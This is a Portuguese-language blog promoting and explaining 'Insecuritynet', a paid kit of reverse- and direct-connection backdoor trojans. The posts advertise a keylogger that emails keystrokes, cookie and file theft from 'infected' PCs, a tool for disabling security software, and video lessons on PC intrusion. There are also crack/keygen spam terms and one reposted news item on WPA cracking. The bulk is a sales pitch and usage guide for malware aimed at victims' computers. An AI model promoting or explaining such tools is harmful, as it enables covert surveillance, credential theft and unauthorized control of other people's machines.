terça-feira, 2 de fevereiro de 2010

Insecuritynet e Internet a Radio


Galera, fiz este tutorial para o pessoal que possui internet a rádio ou está dentro de uma rede privada e deseja utilizar o insecuritynet.

O principal ponto é que o programa funciona em rede fechada, apenas o tipo de conexões podem mudar.

Antes de tudo vamos ver qual a principal caracteristica que temos quando estamos em uma rede privada: IP NAT (Network Address Translation)

O IP NAT é um IP válido apenas dentro de sua rede.
Vamos analizar esta rede com 4 micros.



Observe que temos 4 computadores ligados no mesmo modem.
Temos apenas um IP válido na internet ( O IP obtido pelo Modem: 189.15.48.7 )

Temos 4 IPs individuais para cada computador (198.168.0.2, 198.168.0.3, 198.168.0.4 e 198.168.0.5)

Estes IPs 198.X.X.X são válidos apenas dentro da rede, voce não pode utilizar este IP para se conectar a ninguem que esteja fora de sua rede.

Vamos analizar a ferramenta (Backdoor de conexao reversa):
Neste tipo de backdoor é o Backdoor que conecta ao seu PC. O backdoor contem seu IP para conectar, se voce infectar um computador que esteja fora de sua rede ele não vai conectar pois voce não tem um IP valido na internet, o IP 198.x.x.x só é valido na sua rede, e o IP 189.15.48.7 não pertence ao seu computador,apenas ao modem.

Para isto no Insecuritynet possui um backdoor identico, com as mesmas funções mas é por conexão direta.
A única diferença é que voce precisa digitar o IP do computador infectado.

TABELA DE POSSIBILIDADES DE CONEXÕES:


Como saber se meu IP é NAT ?
Caso voce esteja usando internet a radio muito provavelmente seu IP sera tipo NAT.
Se voce estiver dentro de uma rede particular.
Algums modens cria uma rede virtual (como o G3 da "oi" e algums modens da telefonica)
Geralmente os Ip que começam com 192 , 172 ou 10 são tipo NAT

Caso voce estaja em uma rede privada e ter acesso ao PC servidor voce pode ter o IP normal da internet, ou redirecionar portas para seu PC de rede.

VIDEO - BACKDOOR DE CONEXAO DIRETA:
http://www.youtube.com/watch?v=9crMDx5q7mg


VIDEO BACKDOOR DE CONEXAO REVERSA:
http://www.youtube.com/watch?v=eeywFOb_Fts


Apesar dos videos serem diferentes, os dois trojans são identicos, a única diferença é a forma de conexão.



sábado, 16 de janeiro de 2010

Insecuritynet à 49,90


Devido ao enorme sucesso da promoção de natal, a equipe insecuritynet resolveu manter o valor do registro do software Insecuritynet por apenas 49,90.
Voce pode comprar diretamente com o pessoal da equipe através do email:
contato@insecuritynet.com
Ou atraves do Pagseguro no site do software:
http://www.insecuritynet.com/registro.html

Para o pessoal que ainda não conhece o programa, assiste as videos aulas:
www.insecuritynet.com/forum/videos

A promoção tem validade do dia 15/01/2010 e ainda tem tem previsão para o término.


Insecuritynet 2.5 Insecuritynet 2.6
crack crackeado serial keygen gratis full free registro




domingo, 6 de setembro de 2009

Download - SCAN de Erros Insecuritynet


Esta ferramenta faz um scan em seu PC a procura de softwares de segurança que podem interferir no funcionamento do programa insecuritynet.
Alguns softwares podem ser pausados e outros removidos.
Apenas para windows XP
Download

Download Display IP

Estava aqui brincando de matematica aplicada a programação.
Programei um Display para mostrar o IP, é legal...alem de capturar o endereço IP, precisa separar os valores e definir posição de caracter para cada valor.
Nem serve pra nada... só estudar programaçao mesmo.

Download



quarta-feira, 2 de setembro de 2009

Cientistas japoneses quebram criptografia WPA em poucos minutos

Os cientistas japoneses Toshihiro Ohigashi, da Universidade de Hiroshima e Masakaty Morii, da Universidade de Kobe, desenvolveram uma forma de quebrar a criptografia do tipo WPA (Wi-FI Protected Access), muito usada na proteção de roteadores de redes sem fio para manter a segurança.

Em questão de minutos, os pesquisadores conseguiram a façanha, apresentada no evento Joint Workshop on Information Security, sediado em Taiwan, há duas semanas. Mais detalhes serão apresentados em conferência no Japão, que deve acontecer no dia 24 de setembro.

Quem faz o ataque consegue ler tráfego criptografado em WPA, que circula em uma rede. Especialistas em segurança já tinham alertado para essa possibilidade em novembro do ano passado, mas os japoneses levaram a teoria à prática e mostraram que a quebra de segurança pode ocorrer em minutos.

Os sistemas de criptografia em roteadores sem fio têm um longo histórico de problemas. O sistema WEP (Wired Equivalent Privacy), lançado em 1997, foi quebrado poucos anos depois e hoje é considerado completamente inseguro.

Já existe, no entanto, alternativa para o WPA. É o WPA 2, que existe desde março de 2006. "Apesar da alternativa mais segura, ainda existe uma grande base instalada pelo mundo que não migrou para o novo sistema", afirma o diretor de marketing da organização Wi-Fi Alliance, Kelly Davis-Felner. A Wi-Fi Alliance é a entidade responsável por estabelecer padrões de redes sem fio para a indústria.

Para o CEO da empresa de segurançca Errata Security, Robert Graham, a nova prática de quebra de segurança não chega a ser um motivo de desespero, mas é preocupante. "Os softwares de segurança existentes no mercado são capazes de barrar esse ataque se o roteador não o fizer, mas a quebra da segurança é o suficiente para os profissionais de tecnologia dispensarem o sistema WPA", diz.

A alteração do tipo de segurança no roteador é simples e pode ser configurado por qualquer pessoa que tenha acesso administrativo à interface do equipamento.



FONTE:
http://pcworld.uol.com.br/noticias/2009/08/31/cientistas-japoneses-quebram-criptografia-wpa-em-poucos-minutos/



sábado, 1 de agosto de 2009

Video aula - Invasao PC - Backdoor 2.3




O video fala sobre a atualização do insecuritnet para a versão 2.3 (conexao reversa)

Tópicos abordados:
- Processo de criaçao do server
- Como conectar no PC infectado
- Baixar arquivos para seu computador
- Vizualizar todos os processos e conexões do PC infectado
- Criar um log com todos os dados do PC (incluindo os arquivos do usuario)
- Baixar cookies
- Enviar uma mensagem
- Floodar o desktop
- etc .....


PARTE_1
http://www.youtube.com/watch?v=eeywFOb_Fts
PARTE_2
http://www.youtube.com/watch?v=o5C4tw3M1e0
PARTE_3
http://www.youtube.com/watch?v=Ppx-I3QZpaA


Ou no blip tv (parte única):
http://insecuritynet.blip.tv/file/2405292/




sábado, 25 de julho de 2009

Insecuritynet 2.3 ja está disponível



Atualizaçao dos Trojans
- Os trojans de conexao reversa e direta possuem exatamente as mesmas funçoes, só muda a forma de conexao.
- Download de arquivos do PC infectado
(Baixa arquivo sem usar o navegador, com barra de status e estimtiva de tempo)
- Cria um Log de todo o sistema
(Salva nome de todos os progarmas abertos, sites conectados, dados do sistema e usuario, e os arquivos dos principais diretorios do windows, tudo isto em um único arquivo de texto)
- Envio de mensgens mais pratico
(agora voce não precisa mais digitar msg *)
- Exibe conexoes e processos do PC infectado
(Todos os processos ativos, da para saber quais programas estão abertos)
- Exibe a medias disponveis
(Voce sabe se o computador tem outras partiçoes no HD, CD do drive, pendrive, alem de saber voce tambem tem acesso a todas as medias)
- Exibe dados importantes do sistema
(Sistema operaciona, usuario, data de formataçao, itens de hardware etc..)

Tambem ja vem com os comandos prontos para os preguisos que não querem aprender a usar o prompt XD rsrsrs
-Reiniciar
-Desligar
-Enviar mensagem
-Flood Desktop
-Finalizar Programa
-Abrir Sites


Atualizaçao do Keylogger
Na versão anterior o keylogger gerava um log no PC infetado e este log ia ficando cada ves maior, em poucos dias o log estava enorme e vc recebia sempre o mesmo log mais com o final adicionado, as veses até não enviava mais por ele estar muito grande.
Na versão 2.3, o log é criado, a cada 200 carcteres digitados vc recebe um email.
Apos a CONFIRMAÇAO que este email foi enviado este log é deletedo e comessa a ser criado um outro log.
O log que voce recebe no email ja vem com data e hora da emissão.


Atualizaçao do Port Scan
Na versao anterior o port scan fazia uma tentativa de conexão em cada porta e só encerrava a temtatia qundo o servidor remoto enviava o timeout.
Nesta nova versão o timeout é definido pelo insecuritynet, se a porta não responder em 2000 ms ele ja define como timeout.
Isto deixa o Scan muito mais rapido, sem perder a eficiencia.

Testes para a versão demo:
Agora voce pode testar o trojan mesmo sem registrar o programa.
Basta entrar em:
INICIO --> Invasao e captura de dados --> Auto Infect
Entre em auto infectar/ remover
Escolha uma senha para voce não ficar vulneravel
a porta esta padronizada (15 )
Vc se auto infecta sem a necessida de criar o server, o programa mesmo faz o papel do server.
Depois entre em "conectar" digite seu IP e conecte ao trojan
Para tirar o server de seu PC entre em "infectar/ remover "
Nesta nova versão todas as ferramentas do trojan full estão disponiveis no auto infect para teste.
Se voce não estiver usando roteador ou rede privada, voce podera se auto infectar e enviar seu IP para outra pessoa conectar em sua makina.(voce deverá fornecer a senha que voce definiu)


Servidor HTTP
Agora voce pode Hospedar sites em seu proprio computador com o insecuritynet.
Basta voce ativar o servidor e salvar suas pagina na pasta mapeada pelo insecuritynet.
Esta opçao ja existia no versão anterior mais foi melhorada.
INICIO -> Ferramentas --> Servidor HTTP
A porta padrão é a 80 (porem alguns servidores de internet blokeiam, caso ist aconteça usa a 8082)

ON LINE (video aulas)

Logo no inicio do programa tem a opçao "On Line"
Estão todos os links oficiais do programa, fi adicionado um canal de videos:
www.insecuritynet.com/videos
Vc encontra todos os videos do insecurtynet (desde a versao 1.0)

Sobre o Registro
A parte de:
REGISTRAR --> Mais informações foi atualizada
Agora tem um FAC com as Dúvidas mais comuns
Para quem ja tem o programa registrado.
Remova a versão anterior e instale a nova versão.
O novo programa ja vai reconhecer que ele esta registrado, nem precisa digitar o serial novamente.
Caso aconteça algum erro na hora da instalaçao reinicie o PC e reisntale.

[Sofware atualizado para a versao 3.X]
Download:
http://www.insecuritynet.com,br


É isto ai, nos estamos trabalhando para sempre melhorar o programa.
Obrigado a todos que utilizam o programa (Demo ou Full).